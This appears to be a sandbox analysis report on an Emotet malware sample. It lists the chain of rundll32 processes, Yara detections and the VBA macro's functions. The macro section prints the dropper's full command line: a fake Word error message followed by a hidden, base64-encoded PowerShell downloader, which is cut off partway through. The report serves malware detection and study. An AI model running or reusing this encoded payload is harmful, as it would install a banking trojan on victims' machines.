                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2091794029.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2091834475.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2091778944.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2836 Parent PID: 260

                                                                    General

                                                                    Start time:06:54:42
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Itwxrtu\wpjaux.bsi',#1
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2094977205.00000000005D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2095245962.0000000000680000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2094912701.0000000000590000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2468 Parent PID: 2836

                                                                    General

                                                                    Start time:06:54:43
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',cGgBEdar
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2095661393.00000000001A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2095687942.00000000001D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2095835293.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2428 Parent PID: 2468

                                                                    General

                                                                    Start time:06:54:44
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gesxrslxkhcnse\kfdzbsrddlvak.pye',#1
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2097666740.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2097597853.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000C.00000002.2098038416.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2512 Parent PID: 2428

                                                                    General

                                                                    Start time:06:54:45
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',VWMVjHoJWTwKe
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2099840618.0000000000380000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2103524497.0000000001FF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.2099966335.0000000000410000.00000040.00020000.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2416 Parent PID: 2512

                                                                    General

                                                                    Start time:06:54:46
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Sqecxzw\ccpuwn.kyt',#1
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2103352962.0000000000250000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2103466457.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000E.00000002.2103316012.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2832 Parent PID: 2416

                                                                    General

                                                                    Start time:06:54:47
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',GOGZBCfUK
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2106050192.0000000000310000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2106091733.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000F.00000002.2106019058.00000000002E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 3040 Parent PID: 2832

                                                                    General

                                                                    Start time:06:54:48
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Swvcgiaelz\sxbljovgm.oha',#1
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2107113862.0000000000480000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2107140273.00000000004B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000010.00000002.2106858683.0000000000360000.00000040.00020000.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2260 Parent PID: 3040

                                                                    General

                                                                    Start time:06:54:49
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',saFFaIU
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2109890189.0000000000430000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2109656728.0000000000370000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000011.00000002.2109908285.0000000000460000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 2240 Parent PID: 2260

                                                                    General

                                                                    Start time:06:54:50
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qxunlgclf\rrjtkhok.xfz',#1
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2110708042.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2110865769.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000012.00000002.2111384488.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 1068 Parent PID: 2240

                                                                    General

                                                                    Start time:06:54:51
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',sKCf
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2111956527.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2112358022.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000013.00000002.2112047074.0000000000240000.00000040.00000001.sdmp, Author: Joe Security

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 1836 Parent PID: 1068

                                                                    General

                                                                    Start time:06:54:52
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Uaceqxeeiarsm\ncdxfzylbgum.nhe',#1
                                                                    Imagebase:0x670000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:Borland Delphi
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.3149778649.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.3149905942.0000000000310000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Author: Joe Security

                                                                    Chronological Activities

                                                                    Analysis Process: rundll32.exe PID: 1360 Parent PID: 1836

                                                                    General

                                                                    Start time:06:54:53
                                                                    Start date:26/01/2021
                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yorvuovvtuqtxoj\wcvkwfajnrxlso.qcf',HPKSdoSG
                                                                    Imagebase:0x260000
                                                                    File size:44544 bytes
                                                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Chronological Activities

                                                                    Disassembly

                                                                    Code Analysis

                                                                    VBA Code

                                                                    Call Graph

                                                                    Graph

                                                                    Module: Gp0t5ucwnkng7fi

                                                                    Declaration
                                                                    LineContent
                                                                    1

                                                                    Attribute VB_Name = "Gp0t5ucwnkng7fi"

                                                                    Executed Functions
                                                                    Function Xusmagx95iuck_o3o, APIs: 126, Strings: 38, Number of lines: 135, Relevance: 297.635
                                                                    APIsMeta Information

                                                                    Array

                                                                    AjzpdH

                                                                    Target

                                                                    Split

                                                                    yqmFHJvF

                                                                    jbkkjHHCd

                                                                    Nkemmqfhxex

                                                                    Content

                                                                    Dt5ebejo9lypr_3vmp

                                                                    Array

                                                                    wPuUI

                                                                    Target

                                                                    Split

                                                                    TfZstIBWb

                                                                    QNBiBDJF

                                                                    Array

                                                                    mQUInscCB

                                                                    Target

                                                                    Split

                                                                    NxyDdD

                                                                    PmHbFtBA

                                                                    Array

                                                                    ZcbWFy

                                                                    Target

                                                                    Split

                                                                    uwcdCFcFJ

                                                                    jmprxcAGG

                                                                    Array

                                                                    upIoDlhH

                                                                    Target

                                                                    Split

                                                                    DpdIEHHc

                                                                    BZLGJ

                                                                    Mid

                                                                    Name

                                                                    Application

                                                                    Array

                                                                    LFmsHlGJO

                                                                    Target

                                                                    Split

                                                                    DReLBGD

                                                                    VlJBAxsF

                                                                    Array

                                                                    QttEc

                                                                    Target

                                                                    Split

                                                                    ybkwIF

                                                                    sInuFuLII

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: OtpOArK

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: iJkmJG

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: mbLvUI

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: vQbVHTJ

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: mbdQXnNAJ

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: SRadpEcF

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: gPxXF

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: IcBqyoTE

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: vMqQFsCmr

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: huzCVaAnM

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: AEpDpJGH

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: nmoAspl

                                                                    Array

                                                                    JNPIBwzJy

                                                                    Target

                                                                    Split

                                                                    MtSXGFAwF

                                                                    xJhvfW

                                                                    GetObject

                                                                    		GetObject("winmgmts:win32_process")

                                                                    Array

                                                                    vXvXQH

                                                                    Target

                                                                    Split

                                                                    AnoeDGEY

                                                                    BBnudDV

                                                                    Mid

                                                                    Len

                                                                    		Len(" ns wu db ndns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db ndcns wu db ndmns wu db nddns wu db nd ns wu db nd/ns wu db ndcns wu db nd ns wu db ndmns wu db nd^ns wu db ndsns wu db nd^ns wu db ndgns wu db nd ns wu db nd%ns wu db nduns wu db ndsns wu db ndens wu db ndrns wu db ndnns wu db ndans wu db ndmns wu db ndens wu db nd%ns wu db nd ns wu db nd/ns wu db ndvns wu db nd ns wu db ndWns wu db ndons wu db nd^ns wu db ndrns wu db nddns wu db nd ns wu db ndens wu db ndxns wu db ndpns wu db nd^ns wu db ndens wu db ndrns wu db ndins wu db ndens wu db ndnns wu db nd^ns wu db ndcns wu db ndens wu db nddns wu db nd ns wu db ndans wu db ndnns wu db nd ns wu db ndens wu db ndrns wu db nd^ns wu db ndrns wu db ndons wu db ndrns wu db nd ns wu db ndtns wu db ndrns wu db ndyns wu db ndins wu db nd^ns wu db ndnns wu db ndgns wu db nd ns wu db ndtns wu db ndons wu db nd ns wu db ndons wu db ndpns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db ndtns wu db ndhns wu db nd^ns wu db ndens wu db nd ns wu db ndfns wu db ndins wu db nd^ns wu db ndlns wu db ndens wu db nd.ns wu db nd ns wu db nd&ns wu db nd ns wu db ndpns wu db nd^ns wu db ndons wu db ndwns wu db ndens wu db nd^ns wu db ndrns wu db ndsns wu db nd^ns wu db ndhns wu db ndens wu db nd^ns wu db ndlns wu db ndlns wu db nd^ns wu db nd ns wu db nd-ns wu db ndwns wu db nd ns wu db ndhns wu db ndins wu db nd^ns wu db nddns wu db nddns wu db nd^ns wu db ndens wu db ndnns wu db nd ns wu db nd-ns wu db nd^ns wu db ndens wu db nd^ns wu db ndnns wu db ndcns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd ns wu db nd IAns wu db ndAgns wu db ndAFns wu db ndMAns wu db ndZQns wu db ndBUns wu db ndACns wu db nd0Ans wu db ndSQns wu db ndBUns wu db ndAEns wu db ndUAns wu db ndTQns wu db ndAgns wu db ndACns wu db ndAAns wu db ndKAns wu db ndAnns wu db ndAHns wu db ndYAns wu db ndJwns wu db ndArns wu db ndACns wu db ndcAns wu db ndQQns wu db ndBSns wu db ndAGns wu db ndkAns wu db ndYQns wu db ndAnns wu db ndACns wu db ndsAns wu db ndJwns wu db ndBCns wu db ndAGns wu db ndwAns wu db ndRQns wu db ndA6ns wu db ndAGns wu db ndYAns wu db ndJwns wu db ndArns wu db ndACns wu db ndcAns wu db ndNwns wu db ndBEns wu db ndACns wu db ndcAns wu db ndKwns wu db ndAnns wu db ndAEns wu db ndgAns wu db ndJwns wu db ndApns wu db ndACns wu db ndAAns wu db ndIAns wu db ndAons wu db ndACns wu db ndAAns wu db ndWwns wu db ndBUns wu db ndAFns wu db ndkAns wu db ndUAns wu db ndBlns wu db ndAFns wu db nd0Ans wu db ndKAns wu db ndAins wu db ndAHns wu db ndsAns wu db ndMgns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndNAns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMQns wu db ndB9ns wu db ndAHns wu db ndsAns wu db ndMwns wu db ndB9ns wu db ndACns wu db ndIAns wu db ndLQns wu db ndBGns wu db ndACns wu db ndAAns wu db ndJwns wu db ndBTns wu db ndAHns wu db ndQAns wu db ndZQns wu db ndBNns wu db ndACns wu db nd4Ans wu db ndaQns wu db ndBPns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAGns wu db ndMAns wu db nddAns wu db ndBvns wu db ndACns wu db ndcAns wu db ndLAns wu db ndAnns wu db ndAHns wu db ndMAns wu db ndeQns wu db ndAnns wu db ndACns wu db ndwAns wu db ndJwns wu db ndByns wu db ndAHns wu db ndkAns wu db ndJwns wu db ndAsns wu db ndACns wu db ndcAns wu db ndLgns wu db ndBkns wu db ndAGns wu db ndkAns wu db ndcgns wu db ndBlns wu db ndACns wu db ndcAns wu db ndKQns wu db ndApns wu db ndACns wu db ndAAns wu db ndIAns wu db ndA7ns wu db ndACns wu db ndAAns wu db ndcwns wu db ndBFns wu db ndAHns wu db ndQAns wu db ndLQns wu db ndBJns wu db ndAHns wu db ndQAns wu db ndRQns wu db ndBNns wu db ndACns wu db ndAAns wu db ndVgns wu db ndBhns wu db ndAFns wu db ndIAns wu db ndaQns wu db ndBBns wu db ndAEns wu db ndIAns wu db ndTAns wu db ndBlns wu db ndADns wu db ndoAns wu db ndUwns wu db ndBnns wu db ndADns wu db ndIAns wu db ndeAns wu db ndBVns wu db ndACns wu db ndAAns wu db ndKAns wu db ndAgns wu db ndACns wu db ndAAns wu db ndWwns wu d) -> 37616

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: OtpOArK

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: iJkmJG

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: mbLvUI

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: vQbVHTJ

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: mbdQXnNAJ

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: SRadpEcF

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: gPxXF

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: IcBqyoTE

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: vMqQFsCmr

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Array

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: huzCVaAnM

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Target

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: Split

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: AEpDpJGH

                                                                    Part of subcall function Zr9iedzfw6nr@Gp0t5ucwnkng7fi: nmoAspl

                                                                    Array

                                                                    TYMfJE

                                                                    Target

                                                                    Split

                                                                    zzXfBb

                                                                    ppqanE

                                                                    Create

                                                                    		SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgA